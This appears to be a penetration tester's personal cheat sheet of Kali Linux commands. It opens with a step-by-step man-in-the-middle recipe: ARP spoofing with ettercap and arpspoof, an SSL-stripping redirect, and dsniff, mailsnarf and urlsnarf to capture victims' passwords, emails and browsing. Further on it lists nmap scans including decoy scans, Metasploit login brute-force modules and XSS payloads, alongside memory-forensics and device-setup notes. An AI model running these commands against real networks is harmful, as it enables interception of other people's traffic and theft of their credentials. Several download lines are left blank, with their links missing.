1. Configure ip forwarding on attacker host

echo “1” > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp –destination-port 80 -j REDIRECT –to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5 Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

5. Urlsnarf – capture http
urlsnarf -i eth0

6. Driftnet – capture images
driftnet -i eth0

7. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

8. Mailsnarf – capture emails
mailsnarf -i eth0

Memory analysis :: Volatility

digital forensics

Memory acquisition:
Dump memory using FTK Imager or similar software.

> volatility pslist -f memory.img

> volatility svcscan -f memory.img –profile=Win7SP0x64

Hidden/terminated processes:
> volatility psscan -f memory.img

Yara scan:
> volatility yarascan –yara-file=/path/to/rules.yar -f memory.img


Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live
  2. Parse list w/ live hosts

    1. cat subnet_live.gnmap | awk ‘{print $2}’ > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports

    1. nmap -sS -sV -O -min-parallelism 400 -max-parallelism 512 -script banner.nse,http-headers -top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports

    1. All found
      1. cat subnet_live_top500.gnmap | grep ’21/open\|22/open\|80/open\|81/open\|85/open\|88/open\|443/open\|1433/open\|3128/open\|3306/open\|5900/open\|8080/open’ | awk ‘{print $2}’ > subnet_live_top_vulnports
    2. FTP
      1. cat subnet_live_top500.gnmap | grep 21/open | awk ‘{print $2}’ > subnet_live_ftp
    3. SSH
      1. cat subnet_live_top500.gnmap | grep 22/open | awk ‘{print $2}’ > subnet_live_ssh
    4. MSSQL
      1. cat subnet_live_top500.gnmap | grep 1433/open | awk ‘{print $2}’ > subnet_live_mssql
    5. MYSQL
      1. cat subnet_live_top500.gnmap | grep 3306/open | awk ‘{print $2}’ > subnet_live_mysql
    6. VNC
      1. cat subnet_live_top500.gnmap | grep 5900/open | awk ‘{print $2}’ > subnet_live_vnc
    7. HTTP
      1. cat subnet_live_top500.gnmap | grep 80/open | awk ‘{print $2}’ > subnet_live_http

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_enum; snmp_login
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O –min-parallelism 400 –max-parallelism 512 –script banner.nse,http-headers –top-ports 500

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln.txt –min-parallelism 512 –min-rate 400 -Pn

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn –min-parallelism 512 –min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt –script ms-sql-info –script-args mssql.instance-port=1433 –min-parallelism 512 –min-rate 400 [ip_range]

Web server enumeration
nmap -sV –script=http-enum [target_ip]

Check for vulns.
nmap –script=smb-check-vulns -p445 [target_ip]

nmap -sn [target_ip] –script=dns-blacklist

nmap -T4 -A -v –script=sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan
nmap -sS -Pn -n -PS [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down
nmap -v -sn -oG – target_ip | grep Down


Scripts :: Kali


KAAISv3 by rawstring

  • wget v4.3 by peterubuntu10

  • wget

Lazy Kali

  • wget
  • wget by

  • svn checkout phillips321 by Lee Baird

  • git clone

1st setup :: Kali


Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb kali main non-free contrib
deb kali/updates main contrib non-free

Bleeding Edge repos
deb kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
3. mount VBoxAdditions package
4. copy install package ( to /tmp
5. chmod 755 /tmp/
6. ./
7. logout or reboot guest machine


  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot




Test cases:

  • >”‘><script>alert(‘XSS’)</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background=”javascript:alert(([code])”></table>
  • <object type=text/html data=”javascript:alert(([code]);”></object>
  • <body onload=”javascript:alert(([code])”></body>

Kali Pi :: Initial Setup



[Static IP]
nano /etc/network/interfaces

Add following lines at the bottom of the file(comment out above lines except loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static

[DNS Conf]
nano /etc/resolv.conf

[Assign static default gateway]
ip route add default via

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status


– TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]

– Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable


Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable